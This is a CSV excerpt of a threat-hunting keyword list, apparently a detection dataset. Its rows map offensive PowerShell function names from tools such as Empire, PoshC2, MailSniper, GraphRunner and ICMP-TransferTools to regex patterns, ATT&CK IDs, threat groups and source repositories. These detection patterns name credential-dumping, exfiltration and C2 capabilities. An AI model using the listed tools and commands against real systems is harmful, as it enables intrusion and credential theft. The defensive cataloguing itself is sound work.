"*Invoke-ForgeUserAgent*",".{0,1000}Invoke\-ForgeUserAgent.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","49050"
"*Invoke-FruityC2*",".{0,1000}Invoke\-FruityC2.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49051"
"*Invoke-Get-FirefoxPasswords*",".{0,1000}Invoke\-Get\-FirefoxPasswords.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","49052"
"*Invoke-Get-RBCD-Threaded*",".{0,1000}Invoke\-Get\-RBCD\-Threaded.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49053"
"*Invoke-Get-RBCD-Threaded*",".{0,1000}Invoke\-Get\-RBCD\-Threaded.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49054"
"*Invoke-GlobalMailSearch*",".{0,1000}Invoke\-GlobalMailSearch.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49055"
"*Invoke-GlobalMailSearch*",".{0,1000}Invoke\-GlobalMailSearch.{0,1000}","offensive_tool_keyword","MailSniper","To search all mailboxes in a domain","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49056"
"*Invoke-GlobalO365MailSearch*",".{0,1000}Invoke\-GlobalO365MailSearch.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49057"
"*Invoke-GoFetch*",".{0,1000}Invoke\-GoFetch.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","1","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","49058"
"*Invoke-Gopher*",".{0,1000}Invoke\-Gopher.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49059"
"*Invoke-GPPPasswordCheck*",".{0,1000}Invoke\-GPPPasswordCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49060"
"*Invoke-GPPPasswordCheck*",".{0,1000}Invoke\-GPPPasswordCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49061"
"*Invoke-GrabTheHash*",".{0,1000}Invoke\-GrabTheHash.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49062"
"*Invoke-GrabTheHash*",".{0,1000}Invoke\-GrabTheHash.{0,1000}","offensive_tool_keyword","Invoke-GrabTheHash","Get the NTLM Hash for the User or Machine Account TGT held in your current session","T1558.004 - T1003.004","TA0006","N/A","N/A","Credential Access","https://github.com/Leo4j/Invoke-GrabTheHash","1","1","N/A","N/A","8","1","6","1","2023-10-26T10:52:51Z","2023-08-22T12:14:53Z","49063"
"*Invoke-GraphOpenInboxFinder -Tokens*",".{0,1000}Invoke\-GraphOpenInboxFinder\s\-Tokens.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49064"
"*Invoke-GraphOpenInboxFinder*",".{0,1000}Invoke\-GraphOpenInboxFinder.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Checks each user?s inbox in a list to see if they are readable","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49065"
"*Invoke-GraphRecon*",".{0,1000}Invoke\-GraphRecon.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Performs general recon for org info user settings directory sync settings etc","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49066"
"*Invoke-GraphRunner*",".{0,1000}Invoke\-GraphRunner.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Runs Invoke-GraphRecon -  Get-AzureADUsers -  Get-SecurityGroups -  Invoke-DumpCAPS -  Invoke-DumpApps -  and then uses the default_detectors.json file to search with Invoke-SearchMailbox -  Invoke-SearchSharePointAndOneDrive -  and Invoke-SearchTeams.","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49067"
"*Invoke-Grouper2*",".{0,1000}Invoke\-Grouper2.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49068"
"*Invoke-Grouper2*",".{0,1000}Invoke\-Grouper2.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49069"
"*Invoke-Grouper3*",".{0,1000}Invoke\-Grouper3.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49070"
"*Invoke-Grouper3*",".{0,1000}Invoke\-Grouper3.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49071"
"*Invoke-HandleKatz*",".{0,1000}Invoke\-HandleKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49072"
"*Invoke-HandleKatz*",".{0,1000}Invoke\-HandleKatz.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49073"
"*Invoke-Handlekatz*",".{0,1000}Invoke\-Handlekatz.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49074"
"*Invoke-HardenedUNCPathCheck*",".{0,1000}Invoke\-HardenedUNCPathCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49075"
"*Invoke-HijackableDllsCheck*",".{0,1000}Invoke\-HijackableDllsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49076"
"*Invoke-HijackableDllsCheck*",".{0,1000}Invoke\-HijackableDllsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49077"
"*Invoke-HiveDump*",".{0,1000}Invoke\-HiveDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49078"
"*Invoke-HiveDump*",".{0,1000}Invoke\-HiveDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49079"
"*Invoke-HiveNightmare.ps1*",".{0,1000}Invoke\-HiveNightmare\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49080"
"*Invoke-HoneypotBuster*",".{0,1000}Invoke\-HoneypotBuster.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","1","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","49081"
"*Invoke-HostEnum -*",".{0,1000}Invoke\-HostEnum\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","N/A","10","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","49082"
"*invoke-hostenum -*",".{0,1000}invoke\-hostenum\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49083"
"*Invoke-HostEnum*",".{0,1000}Invoke\-HostEnum.{0,1000}","offensive_tool_keyword","red-team-scripts","script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. it can also perform limited domain enumeration with the -Domain switch","T1016 - T1087.001 - T1049 - T1069","TA0007 - TA0003 - TA0006","N/A","N/A","Discovery","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","N/A","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","49084"
"*Invoke-HostRecon*",".{0,1000}Invoke\-HostRecon.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49085"
"*Invoke-HostRecon*",".{0,1000}Invoke\-HostRecon.{0,1000}","offensive_tool_keyword","HostRecon","Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. or other system commands to help avoid detection.","T1082 - T1087 - T1033","TA0001 - TA0007  - ","N/A","N/A","Discovery","https://github.com/dafthack/HostRecon","1","1","N/A","N/A","N/A","5","446","120","2017-10-03T13:25:06Z","2017-03-28T14:53:21Z","49086"
"*invoke-hostscan*",".{0,1000}invoke\-hostscan.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49087"
"*Invoke-HotFixVulnCheck*",".{0,1000}Invoke\-HotFixVulnCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49088"
"*Invoke-HTTPServer*",".{0,1000}Invoke\-HTTPServer.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","A basic web server to use for accessing the emailviewer that is output from Invoke-SearchMailbox","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49089"
"*Invoke-IcmpDownload*",".{0,1000}Invoke\-IcmpDownload.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","N/A","4","321","63","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z","49090"
"*Invoke-IcmpDownload.ps1*",".{0,1000}Invoke\-IcmpDownload\.ps1.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","N/A","4","321","63","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z","49091"
"*Invoke-IcmpUpload.ps1*",".{0,1000}Invoke\-IcmpUpload\.ps1.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","N/A","4","321","63","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z","49092"
"*Invoke-IkeextCheck*",".{0,1000}Invoke\-IkeextCheck.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","1","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","49093"
"*Invoke-IkeextExploit*",".{0,1000}Invoke\-IkeextExploit.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","1","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","49094"
"*Invoke-ImmersiveFileReader*",".{0,1000}Invoke\-ImmersiveFileReader.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Open restricted files with the immersive reader","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49095"
"*Invoke-ImpersonateUser*",".{0,1000}Invoke\-ImpersonateUser.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49096"
"*Invoke-ImpersonateUser*",".{0,1000}Invoke\-ImpersonateUser.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49097"
"*Invoke-InjectGEvent*",".{0,1000}Invoke\-InjectGEvent.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49098"
"*Invoke-InjectGEventAPI*",".{0,1000}Invoke\-InjectGEventAPI.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49099"
